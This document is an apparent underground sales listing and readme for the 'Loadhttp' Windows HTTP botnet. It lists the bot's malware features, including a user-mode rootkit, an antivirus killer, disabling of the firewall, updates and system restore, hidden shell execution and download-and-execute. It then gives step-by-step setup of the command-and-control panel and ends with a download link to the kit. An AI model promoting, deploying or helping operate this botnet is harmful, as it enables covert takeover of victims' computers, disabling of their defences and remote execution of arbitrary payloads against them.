Loadhttp Botnet
Bot Feature List:
HTTP bot (communication encrypted using a modified standard encryption algorithm and use of static and dynamic passed around keys)
Coded in C++ (no dependencies other than Windows, no use of CRT, supports unicode/all language characters)
DNS resolving bypasses HOSTS file
Safemode startup ability
Startup with elevation retention (starts up with previously obtained elevated rights)
User-mode rootkit
Persistence and protection of registry key, file, and process
Hides file and startup also not visible in msconfig
Anti-Virus killer (supports 31 security solutions covering 95%+ of the AV market)
Anti-Malware/Botkiller (disables or kills the majority of all malware, even those notorious for being extremely resistant to
tampering. scans heuristically)
Privilege escalation through social engineering
Visit website visible or hidden
Execute shell command visible or hidden
Download & Update (options to confirm with MD5 hash, execute file with commandline arguments, save to specific location)
Uninstallation (gets rid of startup, installed file/directory, executed file, registry keys that hold bot data, and optionally scans
the entire system for any file that matches the MD5 of the currently executed file for deletion)
Disable system restore and delete any old restoration points
Disable Windows Firewall
Disable Windows Update
Detection of shutdown and logoff
Preventing of going into stand-by mode
Support for unlimited domains in configuration
Change homepages on Internet Explorer, Mozilla Firefox, and Google Chrome
Whenever files are deleted by the bot, the memory is freed (safe-delete, a.k.a. data is unrecoverable)
Command&Control Panel is secure from any web-hacking and query injections. supports multi-user management
Proactive AV settings bypasses
CloudFlare support in the Control Panel
~44kb file size
Handling of own Zone.Identifier stream without dampening of optimal internet settings as some other bots do
Additional process persistence via injected watchdog threads
Ability to send a list of download links and have the links be randomly chosen for download or update
Control Panel Feature List:
Captcha on login page prevents any bruteforce attack attempts
Control Panel endured a security audit done by a team of experienced web-vulnerability professionals, you are guaranteed to be hack-safe
Highly detailed information and statistics displayed and stored about your bot network
Detailed displayed commands
Highly modifyable commands: you can pause, restart, and delete commands. You can modify command filters extensively.
Password changing ability
Ability to optionally use a loginpage-URL-key to prevent and discourage panel sniffing attempts
Modifyable bot communication settings
User management page has broad functionality for adding and removing other users, controlling user privileges and seeing how active they have been
There is a page for conveniently viewing the foreground window activity of bots
The control panel is compatible with all recent versions of PHP and MySQL
Panel Setup:
------------
1) Upload all of the files to a webserver at the correct path.
2) Create a Mysql database and note the host, username, password, and db name.
3) In phpmyadmin, navigate to "Import" and select DATABASE.sql from this directory, then upload it.
4) Open up the file CONFIGURATION.php. Input your database credentials and encryption key.
(You should have been provided with the encryption key)
5) Navigate to the /login/ page and log in with the credentials Admin:change_me
6) Once in the panel, go to the Preferences page and change your password.
7) Use the login page key feature available in Preferences for your security as well.
(You visit your login page like: http://panel.net/path/login/?key=1234)
8) You should be able to administer bots and control them through commands now.
9) Now that panel setup is complete, delete or move this file and DATABASE.sql from the webserver.
(This is important)
Download https://mega.nz/#!SV91EYRa!FAEdWqKRHrlfIbQWzAJA-nCSNPGh6lVGCKNYP416IMQ
